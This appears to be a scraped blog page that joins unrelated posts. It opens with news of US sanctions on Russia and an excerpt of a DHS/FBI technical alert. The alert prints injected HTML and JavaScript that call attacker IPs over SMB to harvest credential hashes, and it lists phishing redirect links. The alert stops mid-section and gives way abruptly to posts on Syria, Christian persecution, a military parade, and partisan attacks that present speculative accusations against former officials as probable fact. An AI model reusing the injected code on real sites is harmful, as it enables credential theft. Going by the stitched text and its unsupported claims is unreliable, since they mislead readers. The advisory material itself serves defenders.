CERT/FBI Declaration of Russia Hacking U.S. Infrastructure

US sanctions Russia for election interference, cyberattacks

The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”

CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”

The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.

The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.

US sanctions on Russia coming soon | Free Malaysia Today

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”

The sanctions come after an investigation by the Department of Homeland Security and the FBI.

The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.

The Russian embassy didn’t respond to a request for comment.

‘A long-overdue step’

On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.

“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.

Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.

“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”

Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.

The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”

Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.

The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.

How Russian hackers got into Yahoo accounts - Business Insider photo

Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.

Description

Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

  • spear-phishing emails (from compromised legitimate account),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.

 

Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.

 

Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]

 

Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.

<img src=”file[:]//62.8.193[.]206/main_logo.png” style=”height: 1px; width: 1px;” />

In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:

var i = document.createElement(“img”);

i.src = “file[:]//184.154.150[.]66/ame_icon.png”;

i.width = 3;

i.height=2;

Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.

 

Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)

 

Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.

 

Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.

 

When Napalm, Christian Persecution and Genocide are Ignored

There are several human rights groups operating in the Middle East reporting on civil war and military conflict casualties. Yes, the United Nations is reporting also, including being in theater…but reporting is just reporting while people die, become sick and are displaced such as living under ground for safety as best they can.

The Violations Documentation Center in Syria has filed with evidence to the United Nations Security Council that 59 reports of napalm attacks by the Syrian government and Russian forces, resulting in 6 fatalities. Yes….NAPALM

US Defence Secretary Jim Mattis has warned Syria it would be “very unwise” to use poison gas in Eastern Ghouta amid reports of chlorine attacks.

Mr Mattis did not say President Trump would take military action, but the US struck Syria last April after a suspected gas attack in northern Syria.

Fierce fighting is continuing and the Syrian army says it has surrounded a major town in the rebel-held enclave.

More than 1,000 civilians have been reported killed in recent weeks.

The Syrian military has been accused of targeting civilians, but it says it is trying to liberate the region – the last major opposition stronghold near the capital Damscus – from those it terms terrorists.

The statistical report on deaths and casualties in Syria up to February 2018 is here.

Newsweek reports Christian deaths this way:

The persecution and genocide of Christians across the world is worse today “than at any time in history,” and Western governments are failing to stop it, a report from a Catholic organization said.

The study by Aid to the Church in Need said the treatment of Christians has worsened substantially in the past two years compared with the two years prior, and has grown more violent than any other period in modern times.

“Not only are Christians more persecuted than any other faith group, but ever-increasing numbers are experiencing the very worst forms of persecution,” the report said.

The report examined the plight of Christians in China, Egypt, Eritrea, India, Iran, Iraq, Nigeria, North Korea, Pakistan, Saudi Arabia, Sudan, Syria and Turkey over the period lasting from 2015 until 2017. The research showed that in that time, Christians suffered crimes against humanity, and some were hanged or crucified. The report found that Saudi Arabia was the only country where the situation for Christians did not get worse, and that was only because the situation couldn’t get any worse than it already was.

The authors criticized the administration of President Donald Trump for not holding Saudi Arabia accountable for its human rights violations and instead focusing on the trade relationship between the two nations. In May 2017, Trump signed a $110 billion arms deal with Saudi Arabia during his first overseas trip in office.

The report put special focus on Middle Eastern countries like Iraq and Syria, where the authors argued Christians would have been entirely wiped out if it weren’t for military action and the assistance of Christian humanitarian organizations, like Aid to the Church in Need.

“The defeat of Daesh [the Islamic State militant group] and other Islamists in major strongholds of the Middle East offers the last hope of recovery for Christian groups threatened with extinction,” the report found. “Many would not survive another similar violent attack.”

688836500

Relatives of Coptic Christians who were killed during a bus attack surround their coffins during their funeral service, at Ava Samuel desert monastery, in Minya, Egypt. Getty Images

The report, which was released in November 2017 but received renewed attention this week, is based on research in the countries and testimony from victims. It detailed attacks against Coptic Christians in Egypt and monasteries burned in Syria.

In Africa, the report focused on countries like Sudan, where the government ordered that churches be destroyed, and Nigeria, where ISIS-affiliated groups like Boko Haram have led a surge in attacks on Christians. In Eritrea, hundreds of Christians have been rounded up and imprisoned over the past year because of their faith.

The report also documented numerous case studies in which Christians in countries such as India and Nigeria were murdered or beaten for practicing their faith.

898735196

Indian Christians gathers at St. Teresa’s Church for the midnight Christmas mass in Kolkata, India. Getty Images

“A Christian pastor in India was left in a coma after being beaten in a ‘planned’ attack apparently carried out by Hindutva extremists,” the report noted. “Before slipping into unconsciousness, the pastor told police that the attack was religiously motivated.”

“You must never come to our village to pray. You should never enter our village,” the men told the pastor, according to the report.

In late October, Vice President Mike Pence pledged that the Trump administration would redirect aid money formerly given to the United Nations to the U.S. Agency for International Development, a move that was meant to appease Christian organizations that say the U.N. isn’t doing enough for persecuted Christians.

Will Everyone Love Trump’s Military Parade?

Image result for trump military parade photo

The Pentagon says a military parade requested by President Trump will take place in Washington on Veterans Day to honor those who have served in the military from the Revolutionary War through today.

The document addressed to the chairman of the Joint Chiefs of Staff provides “initial guidance,” including assurances that the display will not include tanks, to minimize damage to the city streets. The D.C. City Council had already tweeted its objections (“Tanks but No Tanks“).

The memo does not estimate the cost, but as NPR has reported, estimates have suggested it would be between $3 million and $50 million. Tamara Keith and Tom Bowman reported that holding it on Veterans Day, which also commemorates the end of World War I, could reduce complaints:

“By potentially tying the parade to the 100th anniversary of the end of the ‘War To End All Wars,’ there may be an effort to associate with the tradition of celebrating war victories and avoid associations with countries like North Korea, China and Russia, which regularly hold military parades, in part for the propaganda value.

“Members of Congress from both parties have been critical of the idea of a military parade, questioning its cost and necessity.”

The memo says the parade will begin at the White House and proceed to the U.S. Capitol, with a “heavy air component at the end.” It notes that Trump will be surrounded by military heroes in the reviewing area at the Capitol.

Full page document found here.

The memo listed a number of guidelines for the parade on Nov. 11 and said the parade route will be from the White House to the Capitol and have a “heavy air component at the end of the parade.”

Military parades in the United States are generally rare. Such parades in other countries are usually staged to celebrate victories in battle or showcase military might.

In 1991, tanks and thousands of troops paraded through Washington to celebrate the ousting of Saddam Hussein’s Iraqi forces from Kuwait in the Gulf War.

The District of Columbia Council had ridiculed the idea of a parade on Pennsylvania Avenue, the 1.2-mile (1.9-km) stretch between the Capitol and the White House that is also the site of the Trump International Hotel.

Pritzker, Boxer, Sherman and MoveOn.org, the Strike Force

The top person on John Kerry’s Iran JPOA team was Wendy Sherman. But then we have Obama’s dear friend Penny Pritzker in the mix too, along with Barbara Boxer and Hillary’s Jake Sherman all part of this National Security Action team, which is all things against Trump. So, while we do have the Director of MoveOn in the mix…this group likely has some robust funding from Soros.

This is a strike force that even includes Jeremy Bash.

He served as Chief of Staff of the CIA (2009-2011) and Defense Department (2011-2013), was Panetta’s right hand person and perhaps we should remember it was Panetta that allowed Hollywood access to top secret information to make a movie, that Zero Dark Thirty movie.

According to a June 15, 2011, email from Benjamin Rhodes, Deputy National Security Advisor for Strategic Communications, the Obama White House was intent on “trying to have visibility into the UBL (Usama bin Laden) projects and this is likely a high profile one.”

Image result for Ben rhodes jake sherman photo

Ben Rhodes the aspiring novelist became Obama’s top advisor even when Rhodes security clearance was denied.

In early July 2012, Obama’s senior White House adviser on Iran, Puneet Talwar, and Secretary of State Hillary Clinton’s right-hand man, Jake Sullivan, arrived in the sleepy Arabian sultanate of Oman, 150 miles across sparkling Gulf waters from the Iranian coast. It was the first significant back-channel contact with Tehran.

FNC: A group of about 50 former Obama administration officials recently formed a think tank called National Security Action to attack the Trump administration’s national security policies.

The mission statement of the group is anything but subtle: “National Security Action is dedicated to advancing American global leadership and opposing the reckless policies of the Trump administration that endanger our national security and undermine U.S. strength in the world.”

National Security Action plans to pursue typical liberal foreign policy themes such as climate change, challenging President Trump’s leadership, immigration and allegations of corruption between the president and foreign powers.

This organization uses the acronym NSA, which is ironic. Three of its founding members – Ben Rhodes, Susan Rice and Samantha Power – likely were involved in abusing intelligence from the federal NSA (National Security Agency) to unmask the names of Trump campaign staff from intelligence reports and to leak NSA intercepts to the media to hurt Donald Trump politically. This included a leak to the media of an NSA transcript in February 2017 of former National Security Adviser Michael Flynn’s discussion with Russian Ambassador to the U.S. Sergei Kislyak. No one has been prosecuted for this leak.

Given the likely involvement of Rhodes, Rice and Power to weaponize intelligence against the Trump presidential campaign, will their anti-Trump NSA issue an apology for these abuses?

It is interesting that the new anti-Trump group says nothing in its mandate about protecting the privacy of Americans from illegal surveillance, preventing the politicization of U.S. intelligence agencies or promoting aggressive intelligence oversight. Maybe this is because the founders plan to abuse U.S. intelligence agencies to spy on Republican lawmakers and candidates if they join a future Democratic administration.

It takes a lot of chutzpah for this group of former Obama officials, who were part of the worst U.S. foreign policy in history, to condemn the current president’s successful international leadership and foreign policy.

After all, ISIS was born on President Obama’s watch because of his mismanagement of the U.S. withdrawal from Iraq and his “leading from behind” Middle East policy. The Syrian civil war spun out of control because of the incompetence of President Obama and his national security team.

This was a team that provided false information to the American people about the 2012 terrorist attack on the U.S. consulate in Benghazi and the nuclear deal with Iran. I wonder if the anti-Trump NSA will include videos on its website of former National Security Adviser Susan Rice falsely claiming on five Sunday morning news shows in September 2012 that the attack on the Benghazi consulate was “spontaneous” and in response to an anti-Muslim video.

And of course there’s the North Korean nuclear and missile programs that surged during the Obama years due to the administration’s “Strategic Patience” policy, an approach designed to kick this problem down the road to the next president. Because of President Obama’s incompetence, North Korean dictator Kim Jong Un may have an H-bomb that he soon will be able to load onto an intercontinental ballistic missile to attack the United States.

It must appall this group of former Obama national security officials that President Trump is succeeding as he undoes everything they worked on.

ISIS will soon control no territory in Iraq or Syria because of the Trump administration’s intensified attacks on it and arming of Kurdish militias.

In sharp contrast to President Obama, President Trump drew a chemical weapons red line in Syria and enforced it.

North Korea is pushing for talks with the U.S. in response to strong United Nations sanctions the U.S. worked to obtain in 2017. And compliance with the new sanctions has been significantly improved, especially by China, as the result of President Trump’s actions.

President Trump repaired the damage done to U.S.-Israel relations by President Obama and has recognized Jerusalem as the capital of Israel – something several previous presidents promised but failed to do.

Iranian harassment of U.S. ships in the Persian Gulf stopped in 2017, likely due to the more assertive Iran policy of President Trump. This includes the president’s successful effort to build a stronger U.S. relationship with Saudi Arabia.

President Trump is right when he says he inherited a mess on national security from the Obama administration. This is because President Obama and his national security team undermined U.S. credibility and left President Trump a much more dangerous world. I doubt the new anti-Trump National Security Action think tank will succeed in convincing Americans otherwise.

List of Participants for Fusion GPS and Smear Mission

Senator Grassley is on the case. He listed names asking for all communications from the following people: For the period from March 2016 through January 2017, please provide all communications to, from, copying, or relating to: Fusion GPS; Bean LLC; Glenn Simpson; Mary Jacoby; Peter Fritsch; Tom Catan; Jason Felch; Neil King; David Michaels; Taylor Sears; Patrick Corcoran; Laura Sego; Jay Bagwell; Erica Castro; Nellie Ohr; Rinat Akhmetshin; Ed Lieberman; Edward Baumgartner; Orbis Business Intelligence Limited; Orbis Business International Limited.; Walsingham Training Limited; Walsingham Partners Limited; Christopher Steele; Christopher Burrows; Sir Andrew Wood, Paul Hauser;4 Oleg Deripaska; Cody Shearer; Sidney Blumenthal; Jon Winer; Kathleen Kavalec; Victoria Nuland; Daniel Jones; Bruce Ohr; Peter Strzok; Andrew McCabe; James Baker; Sally Yates; Loretta Lynch; John Brennan. Details here.

Image result for fusion gps hillary What happened? Hey Hillary how about you tell America who coordinated all these people and who was the architect and save a LOT of misery and resources….

*** The political wheels go round and round and given the anti-Trump envoy that has been mobilized, this operation and army of people will continue through the 2020 general election. AG Jeff Sessions and his Justice Department along with his Inspector Generals and Congressional committees are not likely to complete all these investigations any time soon….so remember these names as we head into the mid-term election and to the general election. And we have not even gotten to the whole FBI equation….

1. Shall we start with Kamala Harris? The sister of Sen. Kamala Harris, the California Democrat who has been floated as a potential presidential candidate in 2020, and the political director for the American Civil Liberties Union (ACLU) are also involved with the group.

The Democracy Forward Foundation, a D.C.-based 501(c)3 nonprofit with a 501(c)4 arm called Democracy Forward, describes itself as a “nonpartisan” group that “scrutinizes Executive Branch activity,” according to its mission statement. Anne Harkavy, the group’s executive director, was a senior legal advisor to the general counsel of Obama for America, Obama’s former campaign committee. Corey Ciorciari, its policy and strategy director who oversees Democracy Forward’s policy, research, and communications teams, was a policy advisor for Clinton during her 2016 campaign.

Javier Guzman, the legal director, came from the Department of Justice. Alex Hornbrook, Democracy Forward’s operations director, served as director of scheduling and advance for Hillary for America, Clinton’s campaign committee.

Democracy Forward’s board of directors also features a number of liberal power players.

Elias chairs the board that includes Podesta. Maya Harris, Sen. Kamala Harris’s sister who helped craft Clinton’s agenda for the failed campaign and is a political analyst for MSNBC, is also a member of its board.

Faiz Shakir, who became the national political director of the ACLU in January; Ronald Klain, a Democratic operative who was President Obama’s “Ebola Czar”; Matthew Miller, an MSNBC justice and security analyst; and Scott Nathan, a senior fellow at the Center for American Progress, which was founded by Podesta, also sit on the board of directors. More here.

2. Congressional documents and recently leaked texts between Sen. Mark Warner (D-Va.) and a registered foreign agent for a Russian aluminum oligarch indicate that Daniel J. Jones is intimately involved with ongoing efforts to retroactively validate a series of salacious and unverified memos produced by Christopher Steele, a former British intelligence agent, and Fusion GPS. Jones, a former Feinstein staffer who wrote a controversial top-secret report on alleged torture by the Central Intelligence Agency (CIA), currently runs the Penn Quarter Group, which bills itself as a “research and investigative advisory” and is inconspicuously named after the downtown Washington DC neighborhood where its office is located.

3. How about Shailagh Murray, a former journalist who served as senior adviser to Obama and as former Vice President Joe Biden’s deputy chief of staff? Murray’s husband is Neil King, a former Wall Street Journal reporter who worked at the newspaper at the same time as Fusion GPS’s three co-founders, Glenn Simpson, Peter Fritsch, and Tom Catan. Murray also worked at The Journal until 2005. She joined the Obama administration in 2011. Devin Nunes also sent a letter and questionnaire to Colin Kahl, who served as national security adviser to Biden.

4. Okay, what about CNN ad Evan Perez? Perez covers the Justice Department for CNN. Glenn Simpson, the Fusion co-founder most often associated with the dossier, is used to working on stories with Perez. As reporters at The Wall Street Journal, Perez and Simpson regularly co-authored stories on national security. Another Fusion founder, Tom Catan, worked as a reporter for the Journal at the same time as Perez and Simpson. The third Fusion co-founder, Peter Fritsch, worked above Perez and Simpson as the senior national security editor. Details and evidence is here.

5. Seems Marc Elias as the chair of Perkins Coie’s Political Law Group, was/is the grand marshal of this operation. Marc served as general counsel to Hillary for America, Hillary Rodham Clinton’s presidential campaign in 2016. He served in the same role for John Kerry’s presidential campaign in 2004. His political committee clients include the Democratic National Committee, Democratic Senatorial Campaign Committee, Democratic Congressional Campaign Committee, Democratic Governors Associations, National Democratic Redistricting Committee, Priorities USA, Senate Majority PAC, House Majority PAC and EMILY’s List. He currently serves as the chair of two organizations: Democracy Forward and We the Action. He serves on the board of directors of Priorities USA and on the advisory board of Let America Vote and Access Democracy. Marc is the former co-chair of the bipartisan Committee to Modernize Voter Registration. Marc served on the American Bar Association’s Standing Committee on Election Law and as an adviser to two American Law Institute projects: Principles of Government Ethics and Principles of Election Law: Resolution of Election Disputes.

Hillary Clinton’s campaign lawyer Marc Elias, allegedly denied media reports that the Clinton campaign had any connection to the controversial Russian Dossier.  After the Washington Post ran an extensive story on how the Clinton Campaign and Democratic National Committee hired controversial research firm Fusion GPS to dig up dirt on Donald Trump in Russia in the “Russian Dossier” matter.  Reporters at the New York Times have accused Elias of lying in past categorical denials of any connection to Clinton or the DNC.  The reports indicate that not only did the Clinton team fund the opposition research but that Elias may have been the person handling much of the arrangements.  Now Elias’ position has worsened after a report out of Congress that he was present in an interview when campaign chairman John Podesta denied any campaign role in the funding or acquisition of the dossier.

Here is the nut of the report:
“Podesta was asked in his September interview whether the Clinton campaign had a contractual agreement with Fusion GPS, and he said he was not aware of one, according to one of the sources. Sitting next to Podesta during the interview: his attorney Marc Elias, who worked for the law firm that hired Fusion GPS to continue research on Trump on behalf of the Clinton campaign and DNC, multiple sources said. Elias was only there in his capacity as Podesta’s attorney and not as a witness.”
If this and the earlier report is true, Elias not only falsely denied any connection between the Clinton campaign and the dossier to two New York Times reporters but sat silently as Podesta gave false information to congressional investigators.